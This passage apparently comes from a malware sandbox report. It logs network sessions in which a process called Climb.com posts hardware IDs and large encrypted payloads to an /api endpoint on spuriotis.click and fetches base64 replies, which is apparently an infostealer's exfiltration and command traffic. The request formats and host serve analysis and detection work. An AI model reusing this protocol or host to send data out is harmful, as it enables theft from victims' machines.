--X9PI53GFX9Content-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--X9PI53GFX9Content-Disposition: form-data; name="pid"1--X9PI53GFX9Content-Disposition: form-data; name="lid"5FwhVM--lll--X9PI53GFX9Content-Di
2024-12-28 08:35:05 UTC	1126	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=md9um1n329usv61fj1vjhpq9tg; expires=Wed, 23 Apr 2025 02:21:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P8GkBBB1R5QCaSKSDfdC%2BKxo80Kd9sclSD0i54dK%2BiSj7oMrNAwPOraVAB0%2BQr46VeCXcVtn0xot7FL6DmC9lf6iLlOywLq7u18r9IcTYnSbZ6cEuum%2F5Bq4zwpcuKrTCC8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f903701efe3c47c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1468&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2085&delivery_rate=1903520&cwnd=210&unsent_bytes=0&cid=1a816cb478490890&ts=780&x=0"
2024-12-28 08:35:05 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:35:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49790	172.67.128.184	443	7780	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:06 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EH2DXUTUL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 552292 Host: spuriotis.click
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: 2d 2d 45 48 32 44 58 55 54 55 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 45 48 32 44 58 55 54 55 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 48 32 44 58 55 54 55 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 45 48 32 44 58 55 54 55 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --EH2DXUTULContent-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--EH2DXUTULContent-Disposition: form-data; name="pid"1--EH2DXUTULContent-Disposition: form-data; name="lid"5FwhVM--lll--EH2DXUTULContent-Dispos
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: 66 a9 fa a9 09 63 71 a9 36 e3 9c 13 c4 30 90 42 30 ed e5 94 4c 87 3c 1c 88 4d e3 dc 36 35 8c 13 cd 76 a8 e0 91 6d 83 29 a2 bb 65 1a 54 3f ce c7 b4 88 b2 ff 8c 98 82 3d 52 b4 cb db 50 ec e8 1e b5 94 1f 1d 97 b6 bb ae cb 46 04 27 68 51 ab a0 e3 05 6e 50 56 fb 76 b7 9b 07 ef 8d 37 f8 21 ba 1e 27 69 a9 59 6f 31 b6 46 7e 43 71 56 7f b5 f4 94 f1 09 0b 07 29 0a 89 91 85 88 ca 55 8d d9 bc 15 e0 77 80 aa 0c 05 11 c0 cc 00 9a c5 b1 1d bd fc a7 69 68 99 9c 1d 44 9a 68 ac ff 9c d2 c6 9d 30 ba f9 be 5b 22 36 e0 52 6b 6a a4 69 44 f8 00 cf d9 83 54 88 34 d7 7f ff 99 e5 19 9d ab 2b 90 4b a7 65 7d 66 64 fd cf 0f 37 78 36 cc 5a 14 a9 0a 63 a3 45 13 53 39 8c a4 ce 24 b6 b7 a3 f9 78 5d 3c 57 64 d1 9b 87 24 07 fb e2 45 50 6f f9 88 fb f7 9e d8 71 15 06 0d d8 d4 f6 5d fd 6b a7 Data Ascii: fcq60B0L<M65vm)eT?=RPF'hQnPVv7!'iYo1F~CqV)UwihDh0["6RkjiDT4+Ke}fd7x6ZcES9$x]<Wd$EPoq]k
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: 18 54 7e 70 78 fe cc 19 83 78 7d 75 6c e8 bf 9c 85 10 5f 27 1a 74 80 f5 07 44 b5 1d 1f 2f f9 28 ff e4 4f c1 92 8b e2 7b 0a 44 a1 8b a0 d5 4d f6 c1 ef 7f 57 ec f3 24 cf 6d a3 99 dd 7f 12 b5 80 4f 82 20 85 0f da c3 2b b8 02 ae 8f 38 dd dc 39 35 cf 6e fa 47 93 b8 02 c5 6e 05 f0 af 8c 46 81 64 04 bc ef c4 7d 8c d0 44 bc 4d 97 a4 f2 56 ae 9f 50 01 99 61 88 aa 59 bc 76 94 94 0e cf e2 4b 91 24 ad 36 36 50 65 33 0b 59 cb 0a 69 58 29 d1 ec 7a df 69 0d ee 27 bc 7a 07 2f 8f 62 81 30 f7 d6 cb f7 17 31 a9 4b 4a 37 7b f0 1a ae c0 04 d0 95 12 33 33 1b 8c 2a 50 1e 98 d4 a9 a1 28 3b c4 a6 eb d8 be 57 98 da e9 5a cb f9 a3 3e 3a a6 bc cb d6 15 35 2e 5f 70 09 ff e2 33 43 fc 3d 33 ed ed 3f 42 7a 6c 5f ae c2 a2 35 61 4d 6c e3 23 9c 15 49 be bf 3c da 00 fd 65 dd a2 40 95 1f 0e Data Ascii: T~pxx}ul_'tD/(O{DMW$mO +895nGnFd}DMVPaYvK$66Pe3YiX)zi'z/b01KJ7{33*P(;WZ>:5._p3C=3?Bzl_5aMl#I<e@
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: c9 5c e8 39 c6 09 3d 8b dc 6b 7c fd 91 b8 f4 a5 cc 38 fc 17 a1 5a 13 4d 33 83 89 80 68 1f f5 da 55 8e f2 3a 69 26 92 8c a2 0d 99 d0 2e 41 14 19 8c a7 10 47 39 37 f4 f3 ac bb 1b d4 ad c4 f1 1a 0b fa 75 79 bc b3 20 ca c5 9d 5b 7c a0 e0 22 10 40 53 b9 81 c7 7f 0d 24 7f b4 5d d6 63 1b c2 55 28 ab 50 79 ea 7e 24 62 58 6a 2e e1 43 25 e3 81 3d 23 37 96 98 b6 ca d9 8b fc e3 df e3 1c e6 ce 14 e9 25 37 28 cb 1f 37 81 6a fc f1 85 d0 81 aa 13 03 98 0e 34 53 72 e3 db 63 6b 73 62 77 19 e6 53 25 86 8b c3 ff 55 66 fa 72 ee 03 27 7f b6 71 b7 6a 7c 30 55 a3 1e 8b 23 b6 8c e2 ef 3d a0 e8 e3 53 8e d0 52 fb 2d 8d 65 68 b2 13 c8 7e 8c 95 33 b8 cd 41 1c c9 fc 62 42 1b 39 a4 82 b3 30 68 a8 34 68 76 92 c1 bc 08 4d 21 9e 7b 38 29 d2 f5 37 c1 1f 1c e5 68 75 59 2e be 0e f1 de d1 f1 Data Ascii: \9=k\|8ZM3hU:i&.AG97uy [\|"@S$]cU(Py~$bXj.C%=#7%7(7j4SrcksbwS%Ufr'qj\|0U#=SR-eh~3AbB90h4hvM!{8)7huY.
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: 47 02 8c 4a 1a 2f d9 31 da 87 18 bb fe 77 28 d6 0a 3e 33 7c 05 de 4e dc 27 15 2b d1 b9 83 49 b3 9d 7e 11 f4 91 d2 33 e3 14 5f 8d 04 6c f4 ea ff 5f c6 0d 03 c5 76 28 5a 76 12 70 23 d3 1f 23 dc 85 e2 6d 00 28 de 22 14 5e b6 99 5a 44 e1 39 6e f9 e2 e4 f6 de d9 10 19 a4 8c cc fc d6 40 eb 6c 37 9c ef fa 82 45 aa e5 99 6d 84 75 cf ee 4d 34 fb 20 2b 1d 19 72 05 c9 d5 62 f1 5a 6d 3b d1 82 c8 aa 21 6d 78 bf 57 f3 56 c3 30 56 10 9a 36 af 24 6a f0 ef 93 5d a4 5c 34 21 a1 48 92 92 1b 8b 12 93 b2 bf d3 23 51 bb 73 05 a4 74 7c cb 71 4a db 56 09 cd ca 31 4a 27 a7 8d d4 8a b9 56 90 ba 28 b8 e2 b3 21 ab 50 8b 89 ee 16 ce 03 56 23 b2 fd 11 e2 fb 0e 62 d2 82 59 db f4 34 d2 23 78 7c 9e 5f 60 fb 72 04 44 8f 0b f5 62 ef 13 8e 2d 2e 8e 9e af 01 41 2a 2c 2b b7 2c b3 98 8b e5 e0 Data Ascii: GJ/1w(>3\|N'+I~3_l_v(Zvp##m("^ZD9n@l7EmuM4 +rbZm;!mxWV0V6$j]\4!H#Qst\|qJV1J'V(!PV#bY4#x\|_`rDb-.A*,+,
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: 91 79 30 aa 53 92 bb 03 3f 64 46 2f 7b 9b e7 c5 e5 97 ef 06 c8 7b e1 5c 79 8a a3 8c 1b 48 5e e8 ee 15 3c 99 84 a5 86 f0 49 68 3d ef 57 1b c7 7c f2 15 54 67 8a 49 85 69 00 e6 b8 a0 45 45 91 13 23 cf 3e ee 8d ec 20 bd d0 96 87 6b d1 bb 6e e5 81 18 eb 33 e1 d6 dc 58 72 d5 ec 54 6c f2 49 05 d9 fb 75 b1 e2 d4 f8 35 8e 81 08 e1 13 37 48 51 97 e8 62 27 9a 16 b3 85 4e d8 47 fe 2c 33 67 98 07 b9 f1 18 77 ed 3e 16 c5 1f 3c b5 f6 8e be da 40 50 3f 86 b6 aa 97 cd f8 47 1c 9e fd 3b 7c a0 d9 a6 12 2c 3b e8 86 c6 46 c3 15 3d 41 37 45 7a b3 ff d3 be e3 e1 f6 f6 f6 a6 27 a7 d9 09 b1 d9 3f ce 9d 62 ea 67 9d 63 14 5c 5c f8 62 c2 df 14 af 75 be b5 84 29 42 1e 5a c3 1b 49 7d 63 74 84 2c f6 a1 7b a3 4d 16 8c 94 e7 ae 4f c7 a9 f2 bc 6b 33 90 5c 46 32 1c 2b c1 b7 47 37 cb 5c 94 Data Ascii: y0S?dF/{{\yH^<Ih=W\|TgIiEE#> kn3XrTlIu57HQb'NG,3gw><@P?G;\|,;F=A7Ez'?bgc\\bu)BZI}ct,{MOk3\F2+G7\
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: 54 4e 0e 26 24 53 4a 3b 0f 60 0f 14 23 e3 df de 19 cd f4 0c 23 87 9e d3 d5 f2 0e 93 d8 6b f6 32 36 49 9c b3 60 0d 6e 65 9c 3c 6a 52 74 d7 87 b7 c7 b3 ef cf 85 2f 7e 9f fe 09 3e 2b e7 30 ff 7c e8 ec fa 85 52 b1 fe e3 25 99 59 77 c3 69 3f aa f6 0e 75 66 6e a1 b8 dc b4 16 96 48 45 43 6e a9 8a 5a ee ab b7 f9 d6 fd 7d df 7c a3 97 49 7a cc ff f5 05 d1 30 e3 e7 b5 f1 a6 bf 94 6f 1d 87 dc 16 e7 2b b0 5f 37 4b ea ff fb dc fc b7 ab 5d 35 92 4e 85 bd 83 a5 b9 89 35 1d 36 5d 3e 28 f5 de e7 fd 70 84 29 ac be 68 bf 33 f0 c0 5d d2 5b af 5d 4d 08 dd 6a 3d 9f a4 e6 f7 66 46 cb 51 28 8b ba e8 56 e8 ff 66 c6 c6 69 39 d7 da 29 a8 74 e9 ca 76 b1 ad 53 50 c5 f4 2b 98 2a b3 76 48 ad f4 7d 7f a2 d3 5a 6e d8 34 3a fb 29 23 35 b7 a9 cd 6a fe 51 5b 70 57 0d be be 56 ad 9a 16 ed 92 Data Ascii: TN&$SJ;`##k26I`ne<jRt/~>+0\|R%Ywi?ufnHECnZ}\|Iz0o+_7K]5N56]>(p)h3][]Mj=fFQ(Vfi9)tvSP+*vH}Zn4:)#5jQ[pWV
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: 1b 12 49 24 42 7d 83 a7 dd 65 ac 06 1f 9e 1e 41 8c 43 b8 cd 89 aa 92 a8 86 86 bf c4 5d 53 28 38 d6 d4 9e 92 62 ce 4f b6 67 0e 02 3f a1 9c c9 f7 63 96 93 5c e7 63 37 6e 7f 88 89 db 31 46 85 47 05 a3 e0 32 42 d4 e4 71 89 fc c5 fe 40 ef 84 3b 7f fa 5c a2 e1 c3 b1 9c c0 9d b0 ad 92 c2 dd 7b fe e0 3e 55 83 e8 bb 51 c1 ca 6b 56 45 89 88 fb 12 43 17 81 ab 7c ad d0 b5 af ef c4 d4 6b 0c f6 df 71 f2 63 76 8c ba 5c ab c1 6d 1c 63 b9 8d 3a 7d 5b b6 41 43 c7 0d 5b 36 c3 ad 91 40 90 7d e0 df 7b 76 47 d4 54 c1 2b c4 8b 16 b7 ca 51 84 be b3 54 77 83 7e bd 0c e9 b2 f7 c6 ce c7 f1 d7 3c ad a5 53 75 95 95 7e 5e 95 80 30 48 c9 78 c9 58 96 72 1f 9d 44 cc 49 7b df 5b 98 09 6e ea f9 29 48 66 a6 e0 85 10 af a4 8b da 7f 98 5b af 40 c1 cd 21 3a 6c 17 b3 16 fa de ef 3e 20 c7 53 a7 Data Ascii: I$B}eAC]S(8bOg?c\c7n1FG2Bq@;\{>UQkVEC\|kqcv\mc:}[AC[6@}{vGT+QTw~<Su~^0HxXrDI{[n)Hf[@!:l> S
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: ad 5f 60 47 7d 48 28 f6 17 2b b3 40 90 4d 37 c0 0a 81 41 d2 45 7d 93 25 3e 26 30 54 d4 6a 62 c3 dd d4 80 fa f4 b0 1b 39 19 e1 9a d3 b4 1a c9 ff 27 ce cb 9d f6 c0 76 ea f3 f4 f4 84 3e db 5b 80 a5 43 7c 94 69 ba 9e 82 c7 0b 79 dd c0 12 a3 b2 10 a4 53 81 27 4f 46 87 aa cd 05 42 5c bf df 03 54 f6 a8 e8 d7 20 e6 e6 02 7b 99 9c 88 d2 37 d5 bf 96 bd d5 ea 4a 75 1a 76 61 5f 37 3b a9 7a be 52 4d f7 c2 fc ff 8e 91 48 d3 85 3e 5b fd 6e 60 0e 00 d0 7a 15 94 b1 cf 3e 75 8e f9 15 c5 58 bb dd f5 e4 e2 8d 0d 9e e8 f6 1e 89 c2 23 97 26 3a f3 8a 4a d9 25 6e 1f 4f 79 f6 2c 33 c5 14 2b 42 c2 12 d1 29 05 a1 06 42 6d 93 22 22 44 ea 60 f3 d7 e3 51 0b 8f c8 45 91 dc 17 35 ff 0e 73 57 a0 ce fc ef f1 93 fb c9 e7 4c c1 c8 34 fd 95 44 aa 04 a7 de 87 d1 36 b2 79 e4 70 97 7b fa c4 d6 Data Ascii: _`G}H(+@M7AE}%>&0Tjb9'v>[C\|iyS'OFB\T {7Juva_7;zRMH>[n`z>uX#&:J%nOy,3+B)Bm""D`QE5sWL4D6yp{
2024-12-28 08:35:06 UTC	15331	OUT	Data Raw: 07 38 10 76 13 15 bc 75 97 a0 d1 f6 3e e5 23 ee 45 ba a2 48 35 c9 3e 09 61 1b 2c 14 63 43 9d f7 d6 f8 a9 f7 6b 34 de b9 4a 7c 73 1d cf e7 bf f2 a3 b2 fa 43 8d 43 6f 56 7d 6c 24 af 85 c8 a6 57 02 77 4d 23 4e e4 70 b9 d3 9a f8 75 d2 f5 27 29 15 77 83 45 22 86 57 ad 7d 38 11 a6 af b8 c9 17 cf 0e f8 1c e5 a7 72 13 21 8e cf f3 35 2d cc 83 c4 77 85 a5 d1 8c fb f7 99 85 8b 2f 3e 5f 47 3a 4a 81 fc 6d d0 44 a9 c8 33 05 d0 dd 0a f1 a3 59 53 78 29 7e c3 c2 f0 6e ba 70 b7 b6 c8 91 15 f7 57 8a cf 3e 42 dd 10 be f3 40 d8 ce 4f 08 72 a6 82 ac 62 f4 8b 1e e7 cc 88 13 8a 87 0c cd da 11 b5 41 a0 e8 d9 13 3e 83 4d e5 9b d2 e4 32 68 de 6d bd 63 43 17 a4 d6 19 ec 26 18 73 b4 70 d2 a4 55 18 03 2b d4 49 79 1b 42 30 4c 2b 21 d6 cf fe 46 88 fd 56 70 0d f7 c3 b9 34 6d c6 d5 99 21 Data Ascii: 8vu>#EH5>a,cCk4J\|sCCoV}l$WwM#Npu')wE"W}8r!5-w/>_G:JmD3YSx)~npW>B@OrbA>M2hmcC&spU+IyB0L+!FVp4m!
2024-12-28 08:35:09 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:35:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mvt70lk568uatesfij51tvclm0; expires=Wed, 23 Apr 2025 02:21:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NqLyHhUOBEg35KU8Ly3FjyfDJVHnBXEpZPsRt1wp2EMMK%2FUcvMuxK2Nm3oAWTFl3W99lWMaSvoJ9P1fWn4fG9nKDomRzw2ujDMYXityQOSH5C6SxD7%2B65o69aFDhGSbosPE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9037115d690f51-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1461&rtt_var=561&sent=341&recv=572&lost=0&retrans=0&sent_bytes=2834&recv_bytes=554785&delivery_rate=1928665&cwnd=204&unsent_bytes=0&cid=7b402cf9269df4e3&ts=2284&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49801	172.67.128.184	443	7780	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:10 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: spuriotis.click
2024-12-28 08:35:10 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d 26 68 77 69 64 3d 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 Data Ascii: act=get_message&ver=4.0&lid=5FwhVM--lll&j=&hwid=15D9A077C5D0D719D9AC212D15D33917
2024-12-28 08:35:11 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:35:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=53lvgl6p01ohoi0roiaihkdgru; expires=Wed, 23 Apr 2025 02:21:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=INJx2eQ8UFcjRvdhsY9I5%2FZJPvmXzzxOcPblf27ks%2BEFpdtNSB3ae%2FRn1RdBVnXDAAEnyVQ7hfcfKJjDbW3Tc4%2ByZeXviO%2B3Z9mD9dVGbhvK5BdqBf5siACBqqC2%2BAjLG44%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9037283cc4435c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1570&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=979&delivery_rate=1783750&cwnd=249&unsent_bytes=0&cid=a81ef3fdff234176&ts=794&x=0"
2024-12-28 08:35:11 UTC	240	IN	Data Raw: 31 61 66 30 0d 0a 4e 6e 35 73 71 67 50 48 6d 78 37 41 53 4f 65 6c 53 4b 46 48 50 4e 57 2f 6e 75 63 4a 50 66 74 72 6d 34 77 48 66 39 57 65 37 66 56 74 42 55 37 4d 64 2b 57 68 4c 2b 78 71 67 6f 64 79 6b 47 73 65 73 5a 32 6b 78 54 46 6f 67 51 32 72 75 54 4a 47 6c 4e 43 67 6f 6e 4d 4c 4b 38 31 71 38 63 63 78 6e 47 65 75 36 67 76 44 43 56 75 5a 68 2b 32 73 63 48 6d 69 43 73 4b 36 51 51 75 34 2b 34 4f 78 54 30 59 71 32 32 57 54 39 53 33 77 43 64 66 64 41 66 4a 7a 58 5a 62 7a 37 4c 73 6d 42 5a 78 66 30 66 38 31 50 71 50 6e 6d 6f 64 2f 4d 77 54 61 61 61 6a 4d 4c 4a 70 2b 68 50 55 59 35 77 6f 50 37 50 44 37 67 56 68 35 72 79 33 7a 77 47 38 51 6e 4f 75 62 71 52 6b 48 4b 4d 31 75 76 63 4a 64 6e 47 65 72 35 6a 76 47 64 58 Data Ascii: 1af0Nn5sqgPHmx7ASOelSKFHPNW/nucJPftrm4wHf9We7fVtBU7Md+WhL+xqgodykGsesZ2kxTFogQ2ruTJGlNCgonMLK81q8ccxnGeu6gvDCVuZh+2scHmiCsK6QQu4+4OxT0Yq22WT9S3wCdfdAfJzXZbz7LsmBZxf0f81PqPnmod/MwTaaajMLJp+hPUY5woP7PD7gVh5ry3zwG8QnOubqRkHKM1uvcJdnGer5jvGdX
2024-12-28 08:35:11 UTC	1369	IN	Data Raw: 75 34 38 50 61 47 59 56 4f 4c 48 4b 50 51 4b 45 36 62 38 74 36 76 41 54 51 76 2b 44 66 30 36 6d 75 45 4f 37 58 4b 66 74 4d 55 64 62 76 51 32 49 6c 43 63 73 68 54 37 66 52 47 4d 71 62 2f 69 5a 64 63 43 56 54 47 54 49 48 35 55 76 4a 36 6b 63 4a 78 6b 44 46 6f 6a 34 6a 30 30 30 31 74 7a 79 44 73 7a 57 30 5a 68 38 32 33 7a 48 30 72 48 75 4e 4f 76 36 39 6b 72 78 2b 4c 2f 32 50 34 46 33 47 41 31 4f 72 51 57 6c 69 64 4f 74 2f 59 51 52 65 5a 39 6f 4b 79 51 77 67 77 68 56 4b 50 36 58 4f 71 4c 36 54 35 5a 2b 6f 45 54 37 4b 4e 32 5a 52 47 56 5a 6b 78 39 66 78 77 52 2b 33 49 6c 35 4d 47 53 31 6e 65 51 6f 6e 57 53 59 55 39 6f 4d 49 68 6c 78 73 54 69 5a 44 54 71 45 70 78 74 51 7a 58 74 48 51 4f 72 4e 71 33 77 32 39 49 4b 74 35 75 6f 76 56 61 75 6e 75 7a 36 78 53 4f 45 Data Ascii: u48PaGYVOLHKPQKE6b8t6vATQv+Df06muEO7XKftMUdbvQ2IlCcshT7fRGMqb/iZdcCVTGTIH5UvJ6kcJxkDFoj4j0001tzyDszW0Zh823zH0rHuNOv69krx+L/2P4F3GA1OrQWlidOt/YQReZ9oKyQwgwhVKP6XOqL6T5Z+oET7KN2ZRGVZkx9fxwR+3Il5MGS1neQonWSYU9oMIhlxsTiZDTqEpxtQzXtHQOrNq3w29IKt5uovVaunuz6xSOE
2024-12-28 08:35:11 UTC	1369	IN	Data Raw: 4a 31 56 4d 4c 6d 44 76 4c 79 6b 70 4d 37 4e 47 49 6b 32 63 36 4f 4f 78 72 69 2f 4e 78 69 54 32 52 2b 57 66 59 41 31 75 34 78 63 65 6b 56 52 4b 33 4b 4f 6a 72 4e 54 69 34 30 59 57 58 62 42 41 63 33 54 76 2f 7a 6d 53 6d 65 4e 4b 51 63 65 41 4a 63 59 4c 36 36 36 42 75 56 4d 30 33 74 4e 41 6f 4e 70 72 64 6a 37 74 52 4d 6c 54 5a 53 4c 37 66 52 36 45 52 30 65 4d 38 7a 43 4a 53 6b 63 58 6d 73 30 64 68 31 44 2f 31 34 6a 63 2b 35 65 61 30 70 67 49 66 4c 2b 5a 78 6d 37 51 6d 70 33 79 74 31 6e 72 67 4d 55 57 69 7a 64 65 70 59 55 32 52 42 4d 79 2b 58 55 6d 32 7a 72 32 7a 65 30 31 56 35 57 61 68 79 6c 71 55 44 6f 2f 70 49 4d 34 4f 53 61 50 6a 73 5a 35 4e 57 70 59 52 77 73 39 62 55 4a 6e 64 6e 70 49 45 4f 51 48 6c 61 36 58 42 63 4c 41 2f 33 35 30 64 32 79 45 4d 34 49 Data Ascii: J1VMLmDvLykpM7NGIk2c6OOxri/NxiT2R+WfYA1u4xcekVRK3KOjrNTi40YWXbBAc3Tv/zmSmeNKQceAJcYL666BuVM03tNAoNprdj7tRMlTZSL7fR6ER0eM8zCJSkcXms0dh1D/14jc+5ea0pgIfL+Zxm7Qmp3yt1nrgMUWizdepYU2RBMy+XUm2zr2ze01V5WahylqUDo/pIM4OSaPjsZ5NWpYRws9bUJndnpIEOQHla6XBcLA/350d2yEM4I
2024-12-28 08:35:11 UTC	1369	IN	Data Raw: 57 36 64 45 36 2f 55 33 47 34 50 73 68 72 49 42 50 56 58 74 57 76 58 57 4a 71 4d 4b 68 4a 78 2f 32 54 42 30 6e 39 7a 58 71 6e 67 4f 6a 44 6e 39 76 44 4d 4f 6a 64 32 59 76 56 55 52 44 35 4a 46 72 39 64 32 73 6a 4b 66 34 43 58 41 43 6c 37 6c 31 66 4f 67 54 31 2b 34 47 50 79 6e 54 52 32 78 79 61 43 55 63 45 38 4b 2f 47 79 31 31 6e 6d 4d 41 37 4c 76 41 75 38 69 57 49 66 4d 79 59 68 56 45 71 49 6a 37 4f 41 78 53 72 6e 72 33 62 68 46 4d 54 53 53 51 71 72 36 61 66 45 6b 71 4a 41 67 2b 48 39 79 37 66 76 4a 70 57 68 70 6e 56 79 76 39 56 55 53 68 4f 65 72 7a 41 59 72 4a 4e 42 72 6f 65 4e 53 72 43 2b 32 38 6a 6e 4f 4d 48 72 6a 36 50 32 2f 65 51 79 53 42 73 7a 2f 5a 54 79 32 79 49 71 30 55 68 59 39 32 47 43 72 32 58 6d 6c 45 4e 54 30 49 64 63 33 42 61 58 73 30 72 38 Data Ascii: W6dE6/U3G4PshrIBPVXtWvXWJqMKhJx/2TB0n9zXqngOjDn9vDMOjd2YvVURD5JFr9d2sjKf4CXACl7l1fOgT1+4GPynTR2xyaCUcE8K/Gy11nmMA7LvAu8iWIfMyYhVEqIj7OAxSrnr3bhFMTSSQqr6afEkqJAg+H9y7fvJpWhpnVyv9VUShOerzAYrJNBroeNSrC+28jnOMHrj6P2/eQySBsz/ZTy2yIq0UhY92GCr2XmlENT0Idc3BaXs0r8
2024-12-28 08:35:11 UTC	1369	IN	Data Raw: 74 4c 68 51 45 72 6b 70 35 36 68 41 68 45 69 6e 6e 61 52 37 48 75 32 49 4a 4c 68 42 4f 41 77 57 4c 72 55 71 5a 4e 6c 56 5a 34 66 39 4c 6c 73 53 6f 66 6e 76 71 6b 5a 53 44 72 36 57 62 50 7a 63 5a 63 78 76 65 30 53 6d 42 63 4c 34 6f 6a 73 73 6d 74 55 79 44 33 70 35 7a 38 53 67 4f 65 70 76 6b 5a 4e 46 65 35 30 6d 37 52 48 71 43 2b 37 69 67 7a 58 4d 45 7a 6e 36 75 6a 54 53 31 4f 38 57 65 76 37 50 79 50 36 36 4a 75 52 51 69 77 5a 6b 30 66 32 2f 55 71 46 59 36 44 43 43 2b 5a 30 42 61 66 6d 2b 59 78 2f 42 61 30 33 74 4f 6f 7a 42 62 6d 71 67 59 5a 52 4f 54 62 61 62 6f 2f 48 4d 66 4d 79 6b 50 38 6b 30 67 45 49 76 50 76 57 6a 56 4d 4e 6f 67 66 79 33 6d 67 7a 72 39 47 46 68 48 6f 6b 42 70 30 6f 76 76 51 6d 6f 58 32 57 2f 52 53 4f 41 47 57 50 31 71 61 33 52 6e 75 2f Data Ascii: 